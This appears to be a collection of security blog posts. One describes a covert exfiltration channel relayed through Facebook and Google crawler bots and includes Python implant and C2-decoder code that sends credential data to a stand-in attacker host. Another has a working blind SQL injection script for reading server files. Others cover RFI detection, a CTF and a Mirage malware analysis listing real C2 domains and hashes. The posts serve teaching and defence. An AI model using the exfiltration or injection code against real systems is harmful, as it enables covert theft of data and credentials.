APT: bot exfiltration

In the world of advanced persistent threats (APTs), the techniques malware uses to talk to its C2 (Command & Control) infrastructure and to exfiltrate information play an important role. There are as many of them as there are protocols and services, and an attacker is limited only by imagination. A few small examples of “tricks” for disguising illegitimate traffic as apparently normal traffic are:

  • HTTP requests to apparently legitimate pages that have been compromised and now host the C2 code.
  • Abuse of the DNS protocol to exfiltrate data and communicate with the attackers.
  • Abuse of Google Calendar.

The list could be almost as long as the number of past and present APT campaigns. In this post I’d like to offer a different form of exfiltration in which the infected host and the C2 never exchange information directly. They do so through the legions of bots run by the Internet giants: Google, Facebook or Twitter, among others.

What are these bots for? Facebook, for instance, has a set of agents that fetch a preview of the content behind a link when a comment is posted on the social network, so that the linked web content can be presented to the user in a nicer way. When Facebook receives the link it “orders” its bots to visit the URL and extract information from the associated page.

The reader will have realized that by controlling the URL we want the bots to connect to, we have a way of sending information to a domain owned by the attacker, with the request relayed through Facebook. This gives us the first “infected host” -> “C2” channel. Seen from the victim’s perimeter the requests go to the social network, not to the attacker, so they are easy for the victim’s security analysts to overlook. Note, however, that the attacker’s domain still travels in the “href” parameter of the query string, so a proxy that logs full URLs keeps the evidence.

The first obstacle to performing the redirection was the need for a valid, authenticated Facebook account in order to post. Searching a bit further through their documentation, I found that I could post without being authenticated. The trick was in the “Developers” section. Here is the GET request that lets you direct Facebook’s bots at your fancy to visit whatever you send them.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&
origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMAIN TO VISIT
&locale=en_US
&numposts=2
&sdk=joey
&width=500

The quick-witted will already have realized that this can be used not only to exfiltrate information but also, for example, to conduct hidden DoS attacks or to inflate visitor counts. As an example, here is my Apache log after telling Facebook to visit my website.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" 
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1      
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987 
   "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"

The truth is that the amplification is quite good: one request to Facebook generated 43 GETs from 10 different bots to the target website. But I’m getting off topic; we were talking about APTs.
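As an added example (not code from the original post), the following Python sketches both ends of the channel described so far, plus the check a defender can run on the victim side. The C2 host c2.example.net, the allow-list of the organisation’s own hosts and the log lines are assumptions constructed for the demo; the only things taken from the post are the two public endpoints (the Facebook comments plugin URL above and the Google favicon URL used later in the post) and the facebookexternalhit user agent. A one-byte sequence number is prepended to each chunk because, as the log above shows, a single submitted URL is fetched by several bots at once, so chunks can reach the C2 in any order.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlparse

# Assumptions for the demo: the attacker's C2 host and the victim's own web hosts.
C2_DOMAIN = "c2.example.net"
ALLOWED_TARGETS = {"www.example.org", "intranet.example.org"}

# The two public fetchers from the post and the query parameter that names
# the URL they will be told to visit.
FETCHERS = {
    ("www.facebook.com", "/plugins/comments.php"): "href",
    ("www.google.com", "/s2/favicons"): "domain",
}

# Apache combined log line: enough to recover source IP, request path and user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
FB_BOT = "facebookexternalhit"


def exfil_path(seq: int, chunk: bytes) -> str:
    """Path label for one chunk: a 1-byte sequence number plus the data, base32
    encoded so it is a valid URL component. The sequence number lets the C2
    reorder chunks, since several bots fetch concurrently and in any order."""
    if not 0 <= seq < 256 or len(chunk) > 255:
        raise ValueError("seq must fit in one byte and the chunk in a URL label")
    label = base64.b32encode(bytes([seq]) + chunk).decode().rstrip("=").lower()
    return "/q/" + label


def exfil_url(seq: int, chunk: bytes) -> str:
    """What the implant actually requests: a facebook.com URL whose href is the C2."""
    target = "http://%s%s" % (C2_DOMAIN, exfil_path(seq, chunk))
    return "https://www.facebook.com/plugins/comments.php?href=" + quote(target, safe="")


def decode_c2_log(lines) -> bytes:
    """C2 side: rebuild the message from the fetcher's requests, ignoring the extra
    fetches of "/" and images that the bots make on their own (see the log above)."""
    chunks = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or FB_BOT not in m["ua"] or not m["path"].startswith("/q/"):
            continue
        label = m["path"][3:].upper()
        if not re.fullmatch(r"[A-Z2-7]+", label):
            continue
        try:
            data = base64.b32decode(label + "=" * (-len(label) % 8))
        except binascii.Error:
            continue  # a stray path that merely looks like base32
        chunks[data[0]] = data[1:]
    return b"".join(chunks[k] for k in sorted(chunks))


def amplification(lines):
    """(requests, distinct bot IPs) that one submitted URL caused on the target."""
    hits = [m for m in map(LOG_RE.match, lines) if m and FB_BOT in m["ua"]]
    return len(hits), len({m["ip"] for m in hits})


def flag_fetcher_requests(urls, allowed=ALLOWED_TARGETS):
    """Victim side: the destination host (facebook.com, google.com) looks harmless,
    but the target parameter still names the attacker's host; alert on any value
    that points outside the organisation's own hosts."""
    alerts = []
    for url in urls:
        u = urlparse(url)
        param = FETCHERS.get((u.netloc, u.path))
        if param is None:
            continue
        for target in parse_qs(u.query).get(param, []):
            host = urlparse(target if "://" in target else "http://" + target).hostname
            if host and host not in allowed:
                alerts.append((host, url))
    return alerts


if __name__ == "__main__":
    secret = b"user=alice;pass=hunter2"
    pieces = [secret[i:i + 8] for i in range(0, len(secret), 8)]
    ua = '"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"'
    # Constructed C2 log, modelled on the post's, with the bots arriving out of order.
    log = ['66.220.152.11%d - - [30/Oct/2014:11:44:23 +0100] "GET %s HTTP/1.1" 404 508 "-" %s'
           % (i, exfil_path(i, p), ua) for i, p in reversed(list(enumerate(pieces)))]
    log.append('66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-" ' + ua)
    print(decode_c2_log(log), amplification(log))
    print(flag_fetcher_requests([exfil_url(i, p) for i, p in enumerate(pieces)]))
```

The victim-side function is the practical takeaway: match on destination plus the value of the “href” or “domain” parameter, not on destination alone, and treat any target outside your own hosts as something to look at.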

Now that we can exfiltrate, we need to send control commands to the infected host in the victim organization. For this part we’ll look to Google’s bots for help. These can also be directed so that they not only visit what we want but also carry our orders to the infected host.

Usually, when a C2 wants to execute a command on the victim, the communication is not initiated in the C2 -> “infected host” direction but the other way round: the malware initiates the connection and picks up its orders.

Well, Google has a URL that, given a domain, returns that domain’s favicon, which is perfect for relaying the orders to be executed on the infected host.

http://www.google.com/s2/favicons?domain=DOMAIN-TO-VISIT

Once that URL is requested, we see the following requests from the bot in the C2 log:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

In this favicon we could, using steganographic techniques for example, embed the control information sent to the infected host. We have thus set up bi-directional communication with the C2 without any direct channel between the infected host and the command and control server, perfect for going unnoticed. Whatever is embedded has to survive the processing the favicon service applies to the image before returning it.

The attack of the mutant coffee machines

The other day a friend told me he was at work having a coffee, one of those from the machines that are now standard in most companies, you know, a Nespresso. When he pushed the button something strange happened: the machine got stuck in a loop (they get more and more like computers) with the lights flashing. He turned it off and on again (my friend is a computer engineer) and everything worked fine (just like a computer), so he could satisfy his need for caffeine.

A few minutes later, while enjoying his coffee and a chat (my friend is Spanish), he got a call from someone identifying themselves as a member of the coffee machine’s maintenance staff, asking him whether there was any problem with the machine. With the coffee machine? No… well, yes, but how did you know? You have it monitored? It sent you a fault message? How did it do that? Ah! 3G… No, I didn’t know. Thanks. Bye.

My friend was somewhat mind-boggled. It hadn’t occurred to him that the machine could have a direct line out. Not that it was a bad idea. In fact, it’s an excellent idea for the maintenance service: they can detect faults, even carry out preventive maintenance and, of course, analyze usage patterns: when most coffees are taken, how long the machine is working, whether it usually runs out of water or the user refills it before it empties, whether it overheats. All the information needed not only to maintain the machine, but also to improve the design of later versions, or even to optimize performance simply by updating the software (firmware, to be more exact) controlling the device.

[Read more…]

MUSES: Our best corporate security wishes

In line with a recent Security Art Work post, it is easy to conclude that corporate security makes no sense without user awareness and the promotion of security policies.

Corporate security policies, where they exist, are often a pipe dream: almost all employees know of them, only a few know any of them in detail, and only a handful bother to apply them properly.

However, these policies are key to protecting important company assets, even more so since the adoption of trends like BYOD (Bring Your Own Device) or COPE (Company Owned, Personally Enabled), where company data flows across mobile devices and personal and professional use get mixed.

If we could wish a system to foster our corporate security policies, our wish list would look like this:

  • A system that builds awareness of corporate security policies instead of having us read the policy documents. Additionally, it would be really good if it provided “learn as you go” mechanisms, with recommendations on how to proceed in each situation.
  • Multi-device and multi-platform (operating system) support, to allow the use of a wide range of smartphones and tablets as well as our laptops.
  • A framework that, depending on the situation, performs a risk analysis to balance the best action from a security point of view, taking both risks and opportunities into account.
  • A user-centric platform that works without unnecessary interruptions. Ideally we would barely notice it exists, only receiving recommendations in situations where there is a high risk to specific company assets.

That said, as users of the system, we would still miss something very important:

  • What about our privacy?
  • What kind of interactions would this system monitor?
  • Is our personal information safe?

Therefore, the final wish is that it would only collect the necessary data to ensure policy compliance, without storing personal information.

Let’s take an example to make it clearer: if the security policy states that a blacklisted application must not be installed, the system should only check whether that particular application is installed on the device, discarding any information about the other installed applications.

As for the information the CSO (Chief Security Officer) would receive, personal data would be encrypted. Only the action that jeopardizes company information should be recorded, not who came close to violating a corporate policy.

Hence, the goal is not a system that controls users in order to issue warnings of punishment, but one that automates that control through automated recommendations. These recommendations are meant to reflect the evolution of the corporate culture (security awareness), gradually and progressively building up knowledge of the corporate policies. In my opinion, much more bearable than reading an extensive document, with one more advantage: documented policies are sometimes hard to relate to our daily tasks.

All these wishes, as well as others that will emerge along the way, are the ones we target in the MUSES project, whose motto is “Corporate security with the user at heart”, coordinated by S2 Grupo with the participation of partners from several European countries (Sweden, Germany, Austria, Switzerland, Belgium, Italy and Spain).

Sharing the project and building an open-source community around it is one of our main goals. Hence, everybody is welcome to take part in this open-source experience through our GitHub project.

Starting with this post, we will report on the project’s development. Meanwhile, please do not forget to follow the project on Twitter (@MUSESproject) and Facebook (MUSES Project).

Success is a journey, not a destination. We will keep you informed along the way.

Hunting traditional vulnerabilities on ICS systems

Several months ago (October 2013, if I recall correctly), I found some vulnerabilities in an HMI from OMRON. I wrote a post in Spanish describing the almost endless process we went through from the discovery of the vulnerability to its publication (you can check the automatic Google translation here, though I take no responsibility for it).

Ten months later we got the green light from OMRON (with great work by ICS-CERT and other CERTs), probably mostly pressed by our decision to publish the vulnerability in mid-to-late July. Lucky we’re the good guys. Now the vulnerability has been released, Advisory (ICSA-14-203-01), Omron NS Series HMI Vulnerabilities, so let’s go with the (few) details.

[Read more…]

Avoiding Dionaea service identification

(Please note this post has been translated, so some strings may appear in Spanish, mainly services names)

In previous posts we have already talked about Dionaea (in Spanish), a low-interaction honeypot that offers a variety of network services. The main problem we face when deploying a honeypot is how to customize its services so that scanning tools cannot identify them. The longer it takes an attacker to realize they are interacting with a honeypot, the more likely we are to be able to analyze their methodology and capture exploits, binaries, etc.

We will install Dionaea and modify some of its services to avoid identification by the most popular network scanner: Nmap.

We can get Dionaea from its project page, which also gives the installation steps. In our case we used Ubuntu 12.04 as the base operating system. The services active by default are:

[Read more…]

Read htaccess file through Blind SQL injection

This time I would like to talk about a challenge I solved recently and found quite interesting. We had to access the private area (protected with htaccess) of a website in which we had found a blind SQL injection vulnerability (widely known, but for anyone who does not know it there is a lot of information on the Internet, for example at https://www.owasp.org/index.php/Blind_SQL_Injection).

In MySQL there is the function load_file(), which returns the contents of a file if the database user has the FILE privilege (the MySQL server process must also be able to read the file, and the secure_file_priv setting can restrict where it may read from). So, the first thing we have to do is check whether we have this privilege.

Before proceeding, I would like to clarify that all the queries can be done manually, or with scripts written by oneself, but sometimes it is better to use existing tools that make the task much easier and faster. For example, sqlmap (sqlmap.org) is a really good tool for exploiting SQL injection vulnerabilities.
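As an added example (not the challenge’s own code, which is not on the page), the following Python emulates the situation with sqlite3 so it runs offline: MySQL’s load_file() is replaced by a user-defined function that returns NULL when the FILE privilege is missing, just as MySQL does, and the vulnerable page reveals only whether the query returned a row. The table, the file path and the .htaccess content are constructed for the demo. The payloads are the ones you would send to MySQL (SUBSTR, ASCII and IS NOT NULL behave the same there), with a binary search over the byte value so each character costs 8 requests instead of up to 256.

```python
import sqlite3

# Constructed sample: the protected file the injection is going to read.
HTACCESS = ("AuthType Basic\nAuthName \"private\"\n"
            "AuthUserFile /var/www/.htpasswd\nRequire valid-user\n")


def vulnerable_app(file_priv: bool = True):
    """Stand-in for the vulnerable page: user input is concatenated into the SQL
    and the attacker only observes whether a row came back (boolean blind).
    load_file() is emulated on sqlite3 and yields NULL without the FILE privilege."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "mug"), (2, "pen")])
    conn.create_function(
        "load_file", 1,
        lambda path: HTACCESS if file_priv and path == "/var/www/.htaccess" else None)
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)  # MySQL: ASCII('') = 0

    def page(name: str) -> bool:
        page.calls += 1
        sql = "SELECT id FROM products WHERE name = '%s'" % name  # the injection point
        return bool(conn.execute(sql).fetchall())

    page.calls = 0  # request counter, to see what the extraction costs
    return page


def oracle(page, condition: str) -> bool:
    """Turn a SQL condition into a yes/no answer through the injection point."""
    return page("mug' AND (%s) AND 'a'='a" % condition)


def extract_char(page, expr: str, pos: int) -> int:
    """Binary search the byte value of character 'pos' of 'expr': 8 queries for 0..255."""
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(page, "ASCII(SUBSTR(%s,%d,1)) > %d" % (expr, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def dump_file(page, path: str):
    """First confirm the file is readable at all (FILE privilege, readable path),
    then pull it one character at a time until SUBSTR() runs past the end, where
    ASCII('') returns 0. Returns None when load_file() gives NULL."""
    expr = "load_file('%s')" % path
    if not oracle(page, "%s IS NOT NULL" % expr):
        return None
    out = []
    pos = 1
    while True:
        c = extract_char(page, expr, pos)
        if c == 0:
            return "".join(out)
        out.append(chr(c))
        pos += 1


if __name__ == "__main__":
    app = vulnerable_app()
    print(dump_file(app, "/var/www/.htaccess"))
    print("requests:", app.calls)
    print(dump_file(vulnerable_app(file_priv=False), "/var/www/.htaccess"))
```

Against a real MySQL backend the IS NOT NULL probe already answers the privilege question (load_file() returns NULL both without FILE and for an unreadable path), and the request count printed by the demo is a reminder of why sqlmap’s threaded, optimised extraction is usually preferable to a hand-rolled loop.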

[Read more…]

Increase of RFI attacks using Google

(Please note this post was originally published on 10th January in the Spanish version of SAW, but we find it relevant and couldn’t find time to translate it until now ;)

Lately we have been detecting a significant increase in Remote File Inclusion [1] attacks in which the same pattern is repeated in the attack payload: the injected URL is always http://www.google.es/humans.txt. Although the content of this file is not malicious, the number and frequency of the alerts detected show that a reconnaissance campaign is underway.

The attacking IP addresses are located worldwide (up to 10 countries have been detected, including Spain), which may indicate that one or more botnets are behind this attack. On average, over a period of 10 days, each of these IPs has attacked about 12 targets, generating between 2,000 and 5,000 alerts each.
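As an added example, not from the original post, this Python detection runs over constructed Apache vhost_combined log lines and flags the pattern the post describes: a query parameter whose value is a remote URL, here http://www.google.es/humans.txt. It also aggregates per source IP (alerts, distinct targets, distinct injected URLs) and lists payloads shared by several sources, which is what makes a campaign stand out from scattered probing. The IP addresses, vhosts and paths in the sample are invented; the encoding variants (percent-encoded, double-encoded, null-byte or “?” suffix) are the usual ways such payloads arrive.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "vhost_combined" format: the leading vhost tells us which site was targeted.
LINE_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):\d+ (?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*"'
)
# Remote inclusion needs a URL stream wrapper: http(s), ftp(s) or PHP's data: wrapper.
REMOTE_RE = re.compile(r"^(?:https?|ftps?|data):", re.IGNORECASE)

# Constructed sample lines (IPs from documentation ranges, invented vhosts and paths).
SAMPLE = [
    'www.example.org:80 203.0.113.7 - - [10/Jan/2014:03:12:45 +0100] '
    '"GET /index.php?page=http://www.google.es/humans.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'shop.example.org:80 203.0.113.7 - - [10/Jan/2014:03:12:46 +0100] '
    '"GET /cart.php?lang=http%3A%2F%2Fwww.google.es%2Fhumans.txt%00 HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    'www.example.org:80 198.51.100.23 - - [10/Jan/2014:04:01:10 +0100] '
    '"GET /index.php?page=http%253A%252F%252Fwww.google.es%252Fhumans.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'www.example.org:80 192.0.2.9 - - [10/Jan/2014:04:05:00 +0100] '
    '"GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'www.example.org:80 192.0.2.9 - - [10/Jan/2014:04:05:01 +0100] '
    '"GET /index.php?page=ftp://198.51.100.5/shell.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def rfi_hits(lines):
    """Yield (ip, vhost, parameter, included_url) for every request whose query string
    carries a remote URL as a parameter value. Values are URL-decoded a second time to
    catch double-encoded payloads; a null byte or trailing '?' used to neutralise what
    the application appends to the included path is stripped before comparing."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["uri"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                value = unquote(value).split("\x00", 1)[0].strip().rstrip("?")
                if REMOTE_RE.match(value):
                    yield m["ip"], m["vhost"], param, value


def summarize(hits):
    """Per-source counts: alerts, distinct targets (vhosts) and distinct injected URLs."""
    per_ip = defaultdict(lambda: {"alerts": 0, "targets": set(), "urls": set()})
    for ip, vhost, _param, url in hits:
        d = per_ip[ip]
        d["alerts"] += 1
        d["targets"].add(vhost)
        d["urls"].add(url)
    return dict(per_ip)


def shared_payloads(per_ip, min_sources=2):
    """URLs injected from at least 'min_sources' different IPs: one payload reused from
    many places (the post's google.es/humans.txt) points to a single campaign."""
    sources = defaultdict(set)
    for ip, d in per_ip.items():
        for url in d["urls"]:
            sources[url].add(ip)
    return {url: len(ips) for url, ips in sources.items() if len(ips) >= min_sources}


if __name__ == "__main__":
    summary = summarize(rfi_hits(SAMPLE))
    for ip, d in summary.items():
        print(ip, d["alerts"], sorted(d["targets"]), sorted(d["urls"]))
    print(shared_payloads(summary))
```

A benign included URL such as humans.txt is still worth an alert: the request tells you the parameter is being tested for inclusion, and the same source will come back with a real payload once it finds a vulnerable one.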

[Read more…]

Solution to the challenge

A few days ago we had a new challenge in which we had to find out what techniques or tips were being used recently to install malware. To get this information we only had a compressed file that had been captured.

When we open the file attachment.rar we see that it contains three images of Roman ruins: “0.jpeg”, “1.png” and “3.jpg”.

Looking closely at these pictures, the only strange thing we observe is that there are Roman numerals in the bottom right corner of two of them (“II” and “IV”) and that one picture seems to be missing (number “2”), because after number “1” we only have number “3”.

[Read more…]

New challenge: mail captured.

After some time without any challenge, we are back with a new case in which we should put into practice some techniques that can be used to extract hidden information from apparently “normal” files.

In this case, we have captured an e-mail (with the attachment attachment.rar) belonging to a gang accused of exploiting vulnerabilities in different systems in order to install malware and spy on everything that users do on their machines.

Although at first glance the captured file (attachment.rar) only appears to contain three images, we believe that inside it there are instructions or tips on how they are installing the malware.

As usual, we have provided two rar files that require a password to be opened. The first one (validator1.rar) opens with the solution to part 1 of the challenge, and the second one (validator2.rar) with the solution to the second part. Please note that the challenge is not to try to crack these two files; they only allow you to check whether you have reached the right solution. On this occasion, to solve the second part you must have solved the first one previously.

As always, the solution will be published in a few days on the blog. If we see there are questions about the challenge, we will publish some tips before the solution.

I hope you enjoy this challenge ;)

Targeted Attack Analysis – Mirage

Between the 25th and the 27th of November, some public institutions in Europe were affected by a wave of targeted attacks (TAs). These attacks, delivered through e-mail, were very interesting: they made use of an infrastructure that had already been used in the past in other malware campaigns.

Infection
As in most of these attacks, the infection vector was a spear-phishing campaign. The e-mail messages had an MS Word document attached, and this document contained an embedded exploit for a vulnerability known since 2012, more specifically CVE-2012-0158.

The domain in the “FROM” field of the e-mails belongs to one of the most well-known humanitarian organizations, which made the e-mail messages look completely reliable.

The subjects of the different e-mails referred to dates close to those of the attacks, except for one of them, which advertised the “Top 10 Cities with the Most Beautiful Women”… quite appealing.

Fw: 2013-11-27
Fw: Top 10 Cities with the Most Beautiful Women
RV: Teheran 2013-11-25

The same references appeared in the names of the attached files.

27-11-2013.doc
20131125.doc
Top 10 Cities with the Most Beautiful Women.doc

Thanks to the existing patching and updating policies, the attack’s impact was nil: the MS Word document exploited an old vulnerability in the MSCOMCTL ActiveX control that allows remote code execution, but this vulnerability had already been patched in April 2012 (MS12-027).

Hashes
After calculating the hash of each file, it became obvious that we were dealing with only two different documents.

1598f39b5d670eb0149141df7bbcc483
60fd6b6bcf73586284ab8c403c043c6e

After checking these MD5s on VirusTotal, we saw that someone had already uploaded them before. Therefore, from that moment onwards, the samples were treated as public information.

I will now briefly break down the analysis. This is not a complete analysis of the samples. I will only show the useful information that we have used to solve the incident.

The following files were dropped after executing each of the two documents.

I have highlighted in red the files that malwr.com considered malicious. Even though these files share their names, their hashes are not equal. We will see why later on.

Even so, cross-referencing these with the previous tables, some identical files can be found.

The reception of the different e-mails in such a tight time window, together with the download of some identical files when opening the documents, indicates that both attacks are probably related.

If you want to take an in-depth look at the analyses, you can find them in the following links at malwr.com:
1598f39b5d670eb0149141df7bbcc483 @ malwr.com
60fd6b6bcf73586284ab8c403c043c6e @ malwr.com

Domains
After executing the files in a Cuckoo sandbox and infecting a virtual machine by manually running the files named “kav.exe”, we were able to see that each of the samples connected to a different domain:

yahoo.offlinewebpage.com
link.antivirusbar.org 

This explains why, even though the behavior is the same in both files, the MD5 hash differs for each of them.

In addition, thanks to some information received from external sources, the following domain can also be added to this list:

ks.pluginfacebook.com

When requesting one of these domains, we always get the same response (the body appears to be 16-bit encoded HTML, with the NUL bytes rendered as dots):

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Date: Wed, 27 Dec 2013 15:23:45 GMT
Accept-Ranges: bytes
Content-Length: 362
X-Cache: MISS from ta-prx21
X-Cache-Lookup: MISS from ta-prx21:3128
Via: 1.0 ta-prx21 (squid/3.1.20)
Connection: keep-alive

.
.
..
.
...U.n.d.e.r. .C.o.n.s.t.r.u.c.t.i.o.n.<./.s.p.a.n.>.<./.d.i.v.>.
.
...w.w.w...m.i.c.r.o.s.o.f.t...c.o.m.<./.s.p.a.n.>.<./.d.i.v.>.
.
.<./.b.o.d.y.>.
.
.<./.h.t.m.l.>.
.
.

Accessing the domain through an outdated browser, we cannot see any odd behavior and we obtain the expected response:

With all these data, the hypothesis of everything being part of the same attack is reinforced.

Attribution

Running whois on the domains, the following e-mail addresses and registrant names appeared:

qingwa20112011[at]163[dot]com
dnsjacks[at]yahoo[dot]com 
usa87654310[at]126[dot]com

All the domains, as well as the e-mail addresses of the domain registrants, point to China, as can be seen in this list of e-mails related to TAs originating in China.

A quick Google search for the e-mails involved is enough to see that the address dnsjacks[at]yahoo[dot]com is related to a Mirage campaign originating from China.

Analyzing the requests that appeared in the Mirage campaign and comparing them with the ones found in the attack, we can find some similarities.

[Image: request from the Mirage campaign, extracted from http://www.secureworks.com/]
[Image: request from one of our samples]
At first glance, we can see that they use the same fields (“hl” and “meta”). If we add another of the requests from the campaign analyzed by Secureworks, the “q” field also appears:

[Image extracted from http://www.secureworks.com/]
Here is an image summarizing the investigation related to attribution:

Conclusion
Based on the data obtained during the investigation, we can conclude that the attack came from China.

In addition, if we analyze the recipients of the e-mails, we can see that this attack did not have only one target; rather, several public institutions in Europe were targeted.

The fact that infrastructure from the past was reused, together with the sending of e-mails to many recipients and the nature of the Mirage malware, allows us to conclude that this was not a stealthy attack. This makes us think it was an attempt to steal very specific information (probably financial information) quickly.

This kind of attack is quite common against public institutions, and spear-phishing is a very common infection vector. The use of trusted domains such as that of a well-known humanitarian organization makes the e-mail seem legitimate, which makes detection very hard.

Either way, preventing these attacks is usually simple and goes hand in hand with prompt deployment of software updates and security patches, because most of these attacks do not use 0-days but well-known vulnerabilities that are already patched. In this case, for example, the vulnerability was more than a year old.

To find out whether your organization has been affected by this wave of TAs, search for the domains listed above in your web proxy logs.

I hope this article has been useful or that, at least, it has been interesting to read.